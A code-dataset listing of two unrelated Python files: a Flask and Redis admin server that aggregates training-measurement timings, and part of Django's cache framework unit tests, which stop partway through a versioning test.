| source | python |
|---|---|
admin.py
|
#!/usr/bin/env python
import json
import threading
import time
from datetime import datetime
import pandas as pd
import redis
from flask import Flask
from flask_cors import CORS
from flask_restful import Api, Resource
import util
from train import TrainCenter
from util.config import config
from util.log import log
from util.singleton import SingletonMixin
app = Flask(__name__)
CORS(app)
api = Api(app)
LOOP_INTERVAL_SEC = 5
class LogCollector(SingletonMixin):
def __init__(self):
super(LogCollector, self).__init__()
info = config['pubsub']
self.host = info[0]
self.port = int(info[1])
self.r = redis.StrictRedis(host=self.host, port=self.port, db=0)
self.p = self.r.pubsub()
self.p.psubscribe('*')
def collect(self):
# TODO: get message from pub/sub server
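# redis-py's get_message() returns None when nothing is pending, so this
# loop drains the queued messages and then returns to the caller.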
while True:
raw_message = self.p.get_message()
if not raw_message:
break
# log.warn('raw_message: %s' % raw_message)
self._handle(raw_message)
def _handle(self, raw_message):
data = util.extract_json2(raw_message)
if data is None or 'key' not in data:
return
key = data['key']
# if key == 'START_ML_WORKER':
# worker_id = data['worker_id']
# Center().connect_ml_worker(worker_id)
# elif key == 'START_ML_TRAIN':
# worker_id = data['worker_id']
# code_name = data['code_name']
# train_id = data['train_id']
# Center().start_train(worker_id, code_name, train_id)
# elif key == 'FINISH_ML_TRAIN':
# worker_id = data['worker_id']
# code_name = data['code_name']
# train_id = data['train_id']
# Center().finish_train(worker_id, code_name, train_id)
# elif key == 'REGISTER_TRAIN':
# Center().register_train(data)
if key == 'UPDATE_PS':
Center().update_ps(data)
elif key == 'UPDATE_PS_DETAIL':
Center().update_ps_detail(data)
elif key == 'MEASUREMENT':
Center().update_measurement(data)
elif key == 'TRAIN_NOW':
TrainCenter().train_now(data)
elif key == 'set_variable':
pass
elif key == 'average':
pass
else:
log.error('IMPME: %s' % key)
def start_sub_log_and_command():
log.warn('START THREAD: admin / subscribe log and command')
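# LogCollector and Center inherit from SingletonMixin, so these calls are
# presumably returning the same shared instances on every iteration.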
while True:
LogCollector().collect()
# time.sleep(0.001)
Center().loop_count += 1
time.sleep(LOOP_INTERVAL_SEC)
def start_train_center():
log.warn('START THREAD: admin / train-center')
while True:
TrainCenter().update()
time.sleep(LOOP_INTERVAL_SEC)
class MeasureContainer(object):
def __init__(self):
self.train_ids = set([])
self.group_ids = set([])
self.ps_dict = {} # group_id: { worker_id: data }
self.controller_dict = {} # group_id: data
self.df = pd.DataFrame(
columns=[
'train_id', 'group_id', 'worker_id', 'parallel_count',
'load_rtt', 'save_rtt', 'controller_rtt',
'data_size', 'success', 'cal',
],
dtype='float')
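# How the pieces below fit together: 'ps' and 'controller' measurements for
# the same group_id arrive independently; whichever side shows up second
# triggers _merge(), and the merged record is appended to self.df as one row.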
def _to_list(self, data):
load_end = int(data['num_01_after_load_variables'])
load_start = int(data['num_01_before_load_variables'])
load_rtt = load_end - load_start
save_end = int(data['num_02_after_save_variables'])
save_start = int(data['num_02_before_save_variables'])
save_rtt = save_end - save_start
controller_rtt = int(data['num_05_after_pub_on_controller']) - int(
data['num_03_after_get_on_controller'])
cal = int(data['cal'])
success = 1
return [
data['train_id'],
data['group_id'],
data['worker_id'],
data['parallel_count'],
load_rtt,
save_rtt,
controller_rtt,
data['data_size'],
success,
cal,
]
def update(self, data):
node_type = data['node_type']
group_id = data['group_id']
if node_type == 'ps':
self._update_ps(group_id, data)
else:
self._update_controller(group_id, data)
def get_stat_of_train(self):
d = json.loads(self.get_train_stat_json())
d2 = json.loads(
self.df.groupby(['train_id'])['group_id'].count().to_json(
orient='index'))
for k, v in d.iteritems():
v['count'] = d2[k]
return d
def get_train_stat_json(self):
df = self.df
return df.groupby(['train_id']).mean().to_json(orient='index')
def get_group_stat_json(self):
df = self.df
return df.groupby(['group_id']).mean().to_json(orient='index')
def _update_ps(self, group_id, raw):
worker_id = raw['worker_id']
raw['merged'] = False
if group_id in self.controller_dict:
controller_data = self.controller_dict[group_id]
merged_data = self._merge(raw, controller_data)
self._append(merged_data)
else:
d = self.ps_dict
if group_id not in d:
d[group_id] = {}
group = d[group_id]
group[worker_id] = raw
def _merge(self, ps_data, controller_data):
return util.merge_two_dicts(ps_data, controller_data)
def _append(self, merged_data):
l = self._to_list(merged_data)
df = self.df
df.loc[len(df)] = l
def _update_controller(self, group_id, data):
self.controller_dict[group_id] = data
psd = self.ps_dict
if group_id in psd:
group_dict = psd[group_id]
for ps in group_dict.itervalues():
merged_data = self._merge(ps, data)
self._append(merged_data)
del psd[group_id]
class Center(SingletonMixin):
def __init__(self):
super(Center, self).__init__()
self.loop_count = 0
self.ml_worker = {}
self.ps = {}
self.ps_detail = []
self.measure_container = MeasureContainer()
# def start_train(self, worker_id, code_name, train_id):
# msg = 'Start (%s:%s)' % (code_name, train_id)
# w = self.ml_worker[worker_id]
# w['description'] = msg
# def finish_train(self, worker_id, code_name, train_id):
# msg = 'Finish (%s:%s)' % (code_name, train_id)
# w = self.ml_worker[worker_id]
# w['description'] = msg
# def connect_ml_worker(self, worker_id):
# self.ml_worker[worker_id] = {
# 'worker_id': worker_id,
# 'description': 'connected',
# }
def update_ps_detail(self, data):
group_id = data['group_id']
msg = data['msg']
worker_id = data['worker_id']
now = datetime.now()
now_str = now.strftime('%H:%M:%S.%f')
self.ps_detail.append({
'group_id': group_id,
'worker_id': worker_id,
'msg': msg,
'time': now_str})
def update_ps(self, data):
v = data['value']
group_id = v['group_id']
self.ps[group_id] = v
def update_measurement(self, data):
self.measure_container.update(data)
def get_data(self):
return {
'loop_count': self.loop_count,
'train': TrainCenter().get_info(),
'worker': [v for k, v in self.ml_worker.iteritems()],
'ps': [v for k, v in self.ps.iteritems()],
'ps_detail': self.ps_detail,
'stat_of_group': json.loads(
self.measure_container.get_group_stat_json()),
'stat_of_train': self.measure_container.get_stat_of_train(),
}
class DefaultRoute(Resource):
def get(self):
return Center().get_data()
api.add_resource(DefaultRoute, '/')
def run():
t1 = threading.Thread(target=start_sub_log_and_command)
t1.daemon = True
t1.start()
t2 = threading.Thread(target=start_train_center)
t2.daemon = True
t2.start()
admin_config = config['admin']
app.run(host='0.0.0.0', port=int(admin_config['port']), debug=False)
# app.run(port=int(admin_config['port']), debug=True)
if __name__ == '__main__':
run()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test-specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
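# For illustration only (not part of the original file): a call such as
# caches_setting_for_tests(BACKEND='x.y.Backend') would produce roughly
#     {
#         'default': {'BACKEND': 'x.y.Backend'},
#         'prefix': {'BACKEND': 'x.y.Backend', 'KEY_PREFIX': 'cacheprefix<pid>'},
#         'v2': {'BACKEND': 'x.y.Backend', 'VERSION': 2},
#         ...
#     }
# i.e. every alias gets the shared params plus its per-alias overrides.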
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for cache key conflicts between caches that share a backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
time.sleep(3)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with self.assertWarnsMessage(CacheKeyWarning, expected_warning):
cache.set(key, 'value')
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
